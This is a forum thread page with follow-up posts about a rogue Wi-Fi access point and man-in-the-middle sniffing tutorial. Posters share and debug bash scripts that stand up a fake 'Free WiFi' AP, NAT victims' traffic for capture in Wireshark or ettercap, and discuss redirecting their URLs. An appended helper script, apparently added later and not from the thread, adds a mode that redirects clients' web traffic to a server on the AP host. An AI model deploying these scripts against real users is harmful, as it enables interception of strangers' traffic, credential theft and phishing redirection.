Page 14 of 14, results 131 to 137 of 137

Thread: Rogue Accesspoint + MitM Sniffing tutorial

  1. #131 imported_Deathray (Member, joined Oct 2007, 381 posts)

    Crap, pastebin is down and I don't have the script. XD Yeah, I know... backup. Well, I didn't. :P Working on my Jasager on Fonera+ and successfully got ettercap installed on it. But I forgot how the heck I got ettercap working the way I want it to.

    Would anyone mind providing me with the script if they have it somewhere?
    edit: It's back up again, phew ...
    - Poul Wittig

  2. #132 imported_onryo (Member, joined Apr 2009, 109 posts): Speed

    As a lot of you know, Badkarma has written a wicked rogue AP with Karma functionality that uses ettercap for packet capture and manipulation. It is not only very well written but made for BT4. Seems all his apps are for BT4 now...

    http://www.darkoperator.com/tools-and-scripts/

    The P C 60 seems to work fine, etc. I have tried more or less every soft AP out there, but they all seem to suffer from one detail: they are slow. I am not too sure if fragmentation is the whole story. Has ANYBODY had a rogue AP working that runs really well? If so, what wifi card(s) are you using?

    onryo
    Let me explain officer, I am not a hacker. I am a security tester of sorts!

  3. #133 (Just burned his ISO, joined May 2009, 21 posts)

    I can't get the internet access on the rogue AP to work at all. I have modded the script slightly to make it work with dhcpd3 on BT4. I'm using BT4 in VMWare with an Alfa USB adapter and wired ethernet. I also modded it so it does not use the -P -C flags to interfere with other clients or APs, and removed ettercap for now while I try to get it to work.

    The client gets through the full DHCP cycle: discover, offer, request, ack. Clients get an IP. I can see in Wireshark that the domain names are resolving successfully, but no internet access. Tried using MTU 1500 and 1400. Also checked that I have internet access in BT4 by doing wget. Here's the modded script:

    Code:
    #!/bin/bash
    echo -n "Enter the name of the interface connected to the internet, for example eth0: "
    read -e IFACE
    echo -n "Enter your wireless interface name, for example wlan0: "
    read -e WIFACE
    echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
    read -e ESSID
    # stop any DHCP server, fake AP or sniffer left over from a previous run
    kill `cat /var/run/dhcp3-server/dhcpd.pid`
    killall -9 dhcpd airbase-ng ettercap
    # put the wireless card into monitor mode
    airmon-ng stop $WIFACE
    ifconfig $WIFACE down
    airmon-ng start $WIFACE
    modprobe tun
    
    # start the fake AP in its own konsole; the -P -C variant stays commented out
    konsole -e airbase-ng -e "$ESSID" -v $WIFACE &
    #konsole -e airbase-ng -e "$ESSID" -P -C 30 -v $WIFACE &
    
    sleep 10
    # configure the at0 tap interface that airbase-ng creates
    ifconfig at0 up
    ifconfig at0 10.0.0.1 netmask 255.255.255.0
    ifconfig at0 mtu 1500
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    # reset iptables and NAT client traffic out of the internet-facing interface
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -P FORWARD ACCEPT
    iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE
    # start the DHCP server on at0 with an empty lease file
    echo > '/var/lib/dhcp3/dhcpd.leases'
    konsole -e dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0 &
    #konsole -e ettercap -T -q -p -i at0 // // &
    sleep 8

    Any ideas?

  4. #134 (Just burned his ISO, joined Jun 2009, 8 posts)

    Same problem here: I can connect to my access point, but not to the internet. I have used your modified code.
    (P.S. Does anybody know how to rewrite it to forward all URLs to an Apache web server running on the same machine as the access point?)

  5. #135 (Just burned his ISO, joined Jun 2009, 5 posts)

    Same here :S Waiting for a solution... searching to solve this.

  6. #136 cyberconsole (Junior Member, joined Aug 2007, 57 posts)

    This worked perfectly. Thanks! Very well explained. Kudos.
    There's no fate but what we make for ourselves.

    -I already know I cant spel-

  7. #137 (Just burned his ISO, joined May 2009, 21 posts)

    I've finally got this working after a long while. My setup is as follows:

    Vista laptop running BT4-Beta in VMWare Player
    Internet source is a wireless connection using the on board laptop wifi card, to my Netgear DG834GT router.
    Using the Alfa USB wifi adapter for creating the AP.

    Below is the script which I have modified to get it to work with BT4-Beta. I haven't tried it in BT4 PreFinal.

    Note: The script is also modified so that it will not use the -P and -C options of airbase (the ones which interfere with other clients, aka illegal). If you want that on, then uncomment and comment the relevant lines.
    I also have the ettercap section of the script commented out because I found that BT lagged too much or crashed; you can try it though, just uncomment the line.
    Also: I have modified the script so that it does not ask for the wireless and Internet source interfaces. I got sick of typing wlan0 and eth0 every time I ran the script. It only asks for the AP SSID; the two interfaces are hard coded as wlan0 for the Alfa and eth0 for the Internet source (even though my Internet source is wireless, not ethernet).

    This is running very fast from the client's point of view, I can surf online and I can't tell the difference between using the rogue AP or connecting directly to the router. I have only tried this using an iPhone as the client so far. I can also open up Wireshark and listen on the at0 interface to capture all the traffic passed through the rogue AP.

    Be sure to turn networking on in BT before running the script - otherwise BT will not have an Internet connection to route for the clients. I do this by:

    Code:
    /etc/init.d/networking start

    Then I do a quick test using wget to verify that my internet connection is available to BT:

    Code:
    wget google.com

    Modified script for BT4-Beta:
    Code:
    #!/bin/bash
    
    # The iface inputs are commented out and hard coded, to save having to type them every time the script is executed
    #echo -n "Enter the name of the interface connected to the internet, for example eth0: "
    #read -e IFACE
    #echo -n "Enter your wireless interface name, for example wlan0: "
    #read -e WIFACE
    
    # here I have hard coded the two interfaces, change them if yours are different
    IFACE=eth0
    WIFACE=wlan0
    
    echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
    read -e ESSID
    # stop any DHCP server, fake AP or sniffer left over from a previous run
    kill `cat /var/run/dhcpd.pid`
    killall -9 dhcpd airbase-ng ettercap
    # put the wireless card into monitor mode
    airmon-ng stop $WIFACE
    ifconfig $WIFACE down
    airmon-ng start $WIFACE
    modprobe tun
    # Below is the safe airbase command which does not use the evil options
    konsole -e airbase-ng -e "$ESSID" -v $WIFACE &
    # The line below is commented out, it uses the evil options -P and -C
    #konsole -e airbase-ng -e "$ESSID" -P -C 30 -v $WIFACE &
    sleep 10
    # configure the at0 tap interface that airbase-ng creates
    ifconfig at0 up
    ifconfig at0 10.0.0.1 netmask 255.255.255.0
    ifconfig at0 mtu 1400
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    # reset iptables and NAT client traffic out of the internet-facing interface
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -P FORWARD ACCEPT
    iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE
    # start the DHCP server on at0 with an empty lease file
    echo > '/var/lib/dhcp3/dhcpd.leases'
    konsole -e dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0 &
    # Below ettercap is commented out, just remove the # if you want it on
    #konsole -e ettercap -T -q -p -i at0 // // &
    sleep 8
    # let the kernel route packets between at0 and the internet interface
    echo "1" > /proc/sys/net/ipv4/ip_forward

    Hope this helps those that couldn't get this working in BT4. Thanks to the original author for this interesting experiment.
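The script in post #133 differs from the working one in #137 mainly in the missing `echo "1" > /proc/sys/net/ipv4/ip_forward`, and both scripts leave the FORWARD policy at ACCEPT. The helper below is an added example, not code from this thread or from the original tutorial. It prints or applies a tighter NAT rule set for the at0/eth0 pair the posts use, adds the port-80 redirect to a web server on the AP host that post #134 asked about, and checks the two things a client with a lease but no internet needs: ip_forward and the MASQUERADE rule. The interface names, the 10.0.0.0/24 subnet, the portal port and the `check`/`show`/`apply` sub-commands are all my assumptions and can be overridden from the environment.

```shell
#!/bin/sh
# Added example (not code from the thread): NAT bring-up and self-check for an
# airbase-ng rogue AP. Assumed layout, taken from the posts: airbase-ng has
# created at0, dhcpd3 serves 10.0.0.0/24 from 10.0.0.1, the upstream link is
# eth0. All of these are assumptions and can be overridden via the environment.
AP_IF="${AP_IF:-at0}"
AP_NET="${AP_NET:-10.0.0.0/24}"
AP_ADDR="${AP_ADDR:-10.0.0.1}"
UP_IF="${UP_IF:-eth0}"
PORTAL_PORT="${PORTAL_PORT:-80}"

# Print the commands that make the AP forward. Unlike the thread's
# "iptables -P FORWARD ACCEPT", only the AP subnet is forwarded and only
# replies are let back in. With the argument "portal", client HTTP is DNATed
# to a web server on the AP host instead of going to the internet.
nat_rules() {
    mode="${1:-nat}"
    cat <<EOF
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -F
iptables -F FORWARD
iptables -P FORWARD DROP
iptables -t nat -A POSTROUTING -s $AP_NET -o $UP_IF -j MASQUERADE
iptables -A FORWARD -i $AP_IF -o $UP_IF -s $AP_NET -j ACCEPT
iptables -A FORWARD -i $UP_IF -o $AP_IF -m state --state ESTABLISHED,RELATED -j ACCEPT
EOF
    if [ "$mode" = portal ]; then
        echo "iptables -t nat -A PREROUTING -i $AP_IF -p tcp --dport 80 -j DNAT --to-destination $AP_ADDR:$PORTAL_PORT"
    fi
}

# True when the kernel will route between interfaces. The path is a parameter
# so the check can also run against a saved or constructed file.
forwarding_enabled() {
    f="${1:-/proc/sys/net/ipv4/ip_forward}"
    [ -r "$f" ] && [ "$(cat "$f")" = "1" ]
}

# True when an iptables-save dump (file path in $1) holds the MASQUERADE rule
# for the upstream interface named in $2.
has_masquerade() {
    grep -q -- "-A POSTROUTING .*-o $2 -j MASQUERADE" "$1"
}

# The symptom from posts #133 and #134: clients get a lease, DNS answers, yet
# nothing reaches the internet. Prints one line per missing piece and returns
# the number of missing pieces (0 means the NAT path is complete).
diagnose() {
    fwd_file="$1"; dump="$2"; upif="$3"; missing=0
    if ! forwarding_enabled "$fwd_file"; then
        echo "ip_forward=0: packets from $AP_IF are dropped instead of routed (echo 1 > $fwd_file)"
        missing=$((missing + 1))
    fi
    if ! has_masquerade "$dump" "$upif"; then
        echo "no MASQUERADE on $upif: replies to $AP_NET have no route back"
        missing=$((missing + 1))
    fi
    return "$missing"
}

# show  -> print the commands, apply -> run them as root, check -> diagnose the
# live box. With no argument the script only defines the functions above.
case "${1:-}" in
    show)  nat_rules "${2:-nat}" ;;
    apply) nat_rules "${2:-nat}" | sh -e ;;
    check) dump=$(mktemp); iptables-save > "$dump"
           diagnose /proc/sys/net/ipv4/ip_forward "$dump" "$UP_IF"; rc=$?
           rm -f "$dump"; exit "$rc" ;;
esac
```

`sh rogue-nat.sh show portal` prints the rule set for review, `apply portal` runs it, and `check` runs the two diagnostics against the live kernel and `iptables-save`. The portal mode only catches plain HTTP on port 80; HTTPS clients will see a certificate error rather than the local page, and DNS still goes wherever dhcpd.conf points it.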

